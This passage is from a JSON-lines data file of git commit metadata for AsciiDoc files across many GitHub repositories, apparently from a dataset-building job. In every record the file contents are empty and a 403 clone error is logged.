'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d134e5696c0117fa5fab30683b867acbdf65200f","subject":"Hugo Static Site Generator v0.25","message":"Hugo Static Site Generator v0.25\n","repos":"deild\/reipi,deild\/reipi","old_file":"content\/pattern.asciidoc","new_file":"content\/pattern.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deild\/reipi.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe34c18cee09a81b6306d431e0002173d731a893","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc0f7f4108317febd98275d87f23d32142e32e37","subject":"y2b create post Modern Warfare 3 Xbox 360 Console Unboxing (Limited Edition)","message":"y2b create post Modern Warfare 3 Xbox 360 Console Unboxing (Limited Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-08-Modern-Warfare-3-Xbox-360-Console-Unboxing-Limited-Edition.adoc","new_file":"_posts\/2011-11-08-Modern-Warfare-3-Xbox-360-Console-Unboxing-Limited-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"060372eb13c3e5a171434a0eefabe20c42e0cef4","subject":"Create 200-mathematical-remarks.asciidoc","message":"Create 200-mathematical-remarks.asciidoc","repos":"tensorics\/tensorics-core","old_file":"src\/asciidoc\/200-mathematical-remarks.asciidoc","new_file":"src\/asciidoc\/200-mathematical-remarks.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c072f4326ed1231b61c65e812ed7302495121bad","subject":"Update 2015-11-06-Nibble-game-source-code-released.adoc","message":"Update 2015-11-06-Nibble-game-source-code-released.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-11-06-Nibble-game-source-code-released.adoc","new_file":"_posts\/2015-11-06-Nibble-game-source-code-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad794ea7bdf35f36a6ccb4322493e83e90b9a923","subject":"Update 2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","message":"Update 2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","new_file":"_posts\/2017-06-25-Fraternal-Spotlight-Corey-Harris.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06e516144b0a7808b1ed08bec80f439907770d6b","subject":"Update 2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","message":"Update 2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","new_file":"_posts\/2016-07-25-Pokemon-Go-and-devloper-mode-on-android-make-it-run-on-Wiko-Highway-4G-fictive-positions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4df218104f9b94604502f6a01a0365fb09dfa873","subject":"Update Sec510_Dev_Policy_howtowork.adoc","message":"Update Sec510_Dev_Policy_howtowork.adoc\n\n git pull\u306e\u8a18\u8ff0\u304c\u629c\u3051\u3066\u3044\u305f\u306e\u306e\u3067\u4fee\u6b63","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5c3d5426313a1de10ae52fd360f4e7455ff4b4f","subject":"added doc","message":"added doc\n","repos":"camunda\/camunda-consulting,camunda\/camunda-consulting,camunda\/camunda-consulting,camunda\/camunda-consulting","old_file":"one-time-examples\/camunda-run-delegates-lib\/README.adoc","new_file":"one-time-examples\/camunda-run-delegates-lib\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-consulting.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f176dcddd6fdeec2ae48700bdf7da25ccc91f4c9","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-c-client,Yubico\/yubico-c-client,kellyjf\/yubi,Yubico\/yubico-c-client,kellyjf\/yubi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-c-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"aa4a73a0ed3f94755eff9845ab96c231f36b6c4f","subject":"Fix commenting out the codecov badge","message":"Fix commenting out the codecov badge","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ab0509ca0e82afe7c4c411cf67810f1faa45296","subject":"feat(doc): add README","message":"feat(doc): add README\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cca9e10f831d806541145771849a4d91123df01","subject":"add lbaas option to packstack invocation","message":"add lbaas option to packstack invocation\n","repos":"markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d265a599117dcbd7b0fb3a15a04c9361750162c9","subject":"doc: initial checkin","message":"doc: initial checkin\n","repos":"jhinrichsen\/sense-hat-matrix","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhinrichsen\/sense-hat-matrix.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8972ac754788d3ef10a57a36016d6c3e85ba20d","subject":"Add README.adoc for Github","message":"Add README.adoc for Github\n","repos":"mpx\/lua-cjson,mpx\/lua-cjson,cloudwu\/lua-cjson,cloudwu\/lua-cjson,mah0x211\/lua-cjson,cloudwu\/lua-cjson,mah0x211\/lua-cjson,mpx\/lua-cjson,mah0x211\/lua-cjson","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloudwu\/lua-cjson.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f18bd7fb26e37b9cdd21bca0b1130e98d03292a","subject":"Update 2016-6-28-PHPER-authority-control.adoc","message":"Update 2016-6-28-PHPER-authority-control.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-28-PHPER-authority-control.adoc","new_file":"_posts\/2016-6-28-PHPER-authority-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9958513761da93dc4b95d9a24d166d927386e50","subject":"y2b create post Ultimate Gaming PC Giveaway (UGPC FINALE)","message":"y2b create post Ultimate Gaming PC Giveaway (UGPC FINALE)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-02-Ultimate-Gaming-PC-Giveaway-UGPC-FINALE.adoc","new_file":"_posts\/2013-02-02-Ultimate-Gaming-PC-Giveaway-UGPC-FINALE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17648e22f75aa9bc21faf9e07b36a32df3c51ff2","subject":"Update 2017-11-13-Mautic-Docker-Kohe.adoc","message":"Update 2017-11-13-Mautic-Docker-Kohe.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-13-Mautic-Docker-Kohe.adoc","new_file":"_posts\/2017-11-13-Mautic-Docker-Kohe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"754a704a84b9f33475478b218efadd05e0e6ff9a","subject":"Update 2016-01-07-browsers_spec.adoc","message":"Update 2016-01-07-browsers_spec.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2016-01-07-browsers_spec.adoc","new_file":"_posts\/2016-01-07-browsers_spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"820ca3c5cdc5c6c06535d52012caabde264b478e","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"564014607946db0844a32de712b3212aa02bbc1b","subject":"Update 2015-02-24-Test.adoc","message":"Update 2015-02-24-Test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Test.adoc","new_file":"_posts\/2015-02-24-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"697c5df35d9fd36ca64d23d02a02bd098b8fb096","subject":"Update 2016-04-12-test.adoc","message":"Update 2016-04-12-test.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-test.adoc","new_file":"_posts\/2016-04-12-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d22e8018d8724652c709a9a6f7acdb818a398923","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4c4789f64ee77172dfc9957ee685cccc3db8e7f","subject":"Update 2018-02-23-measuring-performance-of-website.adoc","message":"Update 2018-02-23-measuring-performance-of-website.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4767a4f48f738382eda3c2a5641e60c1d196ab5d","subject":"Update 2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","message":"Update 2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","new_file":"_posts\/2014-04-02-Episode-6-James-Bondage-or-Pinball-Fools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46c3be4b3d707617024f7729b67ac5478b52750a","subject":"Update 2016-03-12-Simple-High-Availability.adoc","message":"Update 2016-03-12-Simple-High-Availability.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Simple-High-Availability.adoc","new_file":"_posts\/2016-03-12-Simple-High-Availability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06caf27fc074395ca96586ff402f338983c8109f","subject":"y2b create post LG G3 Mass Giveaway! [CLOSED]","message":"y2b create post LG G3 Mass Giveaway! [CLOSED]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-02-LG-G3-Mass-Giveaway-CLOSED.adoc","new_file":"_posts\/2014-07-02-LG-G3-Mass-Giveaway-CLOSED.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3e2744e24817a367670ca12e08acdc10dbd510a","subject":"Update 2017-03-14-iniciando-com-nativescript.adoc","message":"Update 2017-03-14-iniciando-com-nativescript.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-14-iniciando-com-nativescript.adoc","new_file":"_posts\/2017-03-14-iniciando-com-nativescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79a7bad78420e9237ec6cc2f702bffb6439f2702","subject":"Update 2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","message":"Update 2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","new_file":"_posts\/2015-09-01-Episode-21-Forum-Questions-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7186a4c32a8d8a825d4bf33d5758973d123d045e","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df0cc51672c072da9020c1d97abc41df82575ee5","subject":"Adds readme","message":"Adds readme\n","repos":"Alotor\/depository","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Alotor\/depository.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"1ccdc65b6f60662749e0c2953db5397803375a11","subject":"y2b create post The iPhone Enlarger - Does It Suck?","message":"y2b create post The iPhone Enlarger - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-10-The-iPhone-Enlarger--Does-It-Suck.adoc","new_file":"_posts\/2016-12-10-The-iPhone-Enlarger--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8969ff9b5e365fbbd3ed89dc87aada0fc6c7918","subject":"Release notes for 0.7.1","message":"Release notes for 0.7.1\n\nChange-Id: I75e32208754ce6e0d026d097871ccc05d2ca0cf7\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2446\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Jean-Daniel Cryans\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a4e61f17e0c1917b0efb1b91b5215f7f03c2704","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b4673b8ded00760326fee0cd0f0cfe11c21320","subject":"fix(doc): title level start to 1","message":"fix(doc): title level start to 1\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0380c28066e0bd07c124bfcb86abb14b64e844c1","subject":"add adoc link to README","message":"add adoc link to README\n","repos":"nickalcock\/help2adoc,klali\/help2adoc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nickalcock\/help2adoc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c78b82af8c10ad4549162be079015a6678ed84fb","subject":"IF start","message":"IF start\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Divers\/IFc.adoc","new_file":"Divers\/IFc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57e1ef8e3250b9ac94bb61a4a8cdab156631ffc9","subject":"y2b create post SMS Audio - SYNC by 50 Headphones Unboxing","message":"y2b create post SMS Audio - SYNC by 50 Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-20-SMS-Audio--SYNC-by-50-Headphones-Unboxing.adoc","new_file":"_posts\/2012-01-20-SMS-Audio--SYNC-by-50-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3140eaa6a3806f62c537925572db4992d09bd98c","subject":"y2b create post The Super Smartphone You've Never Heard Of...","message":"y2b create post The Super Smartphone You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-22-The-Super-Smartphone-Youve-Never-Heard-Of.adoc","new_file":"_posts\/2017-11-22-The-Super-Smartphone-Youve-Never-Heard-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a8e62230fccdc2eb88a9880b6573b071eb7ac98","subject":"y2b create post What If You Could Get AirPods For Only $40?","message":"y2b create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-11-What-If-You-Could-Get-AirPods-For-Only-40.adoc","new_file":"_posts\/2018-02-11-What-If-You-Could-Get-AirPods-For-Only-40.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"592d80f3796d08f8a89f41c5089c03b9399302fe","subject":"Adds building-jdk8.adoc for backwards compatibility","message":"Adds building-jdk8.adoc for backwards compatibility\n","repos":"spring-cloud\/spring-cloud-build,spring-cloud\/spring-cloud-build","old_file":"docs\/src\/main\/asciidoc\/building-jdk8.adoc","new_file":"docs\/src\/main\/asciidoc\/building-jdk8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-build.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f655315a8d20be7654d3da0f0df75c4c191dd002","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"goern\/weather","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goern\/weather.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"004d5544ed89710fd7ecf34fcf44caa4c5e4b177","subject":"Updated README","message":"Updated README\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"025419fdd1df4880aa7da72c35a5265efb7e7f49","subject":"Test AsciiDoc","message":"Test AsciiDoc\n","repos":"juxt\/tick,juxt\/tick","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"200d06af5b9ae2b3884a6c8ed94a113624e4c560","subject":"Update 2015-06-08-A-remplacer.adoc","message":"Update 2015-06-08-A-remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer.adoc","new_file":"_posts\/2015-06-08-A-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1a7533d455c4d89c6b79b434c0b4b45faaf63c8","subject":"Update 2016-08-07-Hello-World.adoc","message":"Update 2016-08-07-Hello-World.adoc","repos":"loetjoe\/blog,loetjoe\/blog,loetjoe\/blog,loetjoe\/blog","old_file":"_posts\/2016-08-07-Hello-World.adoc","new_file":"_posts\/2016-08-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/loetjoe\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd0fc7e2e7737dace80c58b53901cc8cbbad4615","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf591b08fa68484e0a00eff6884d3f27fa3845b0","subject":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","message":"Update 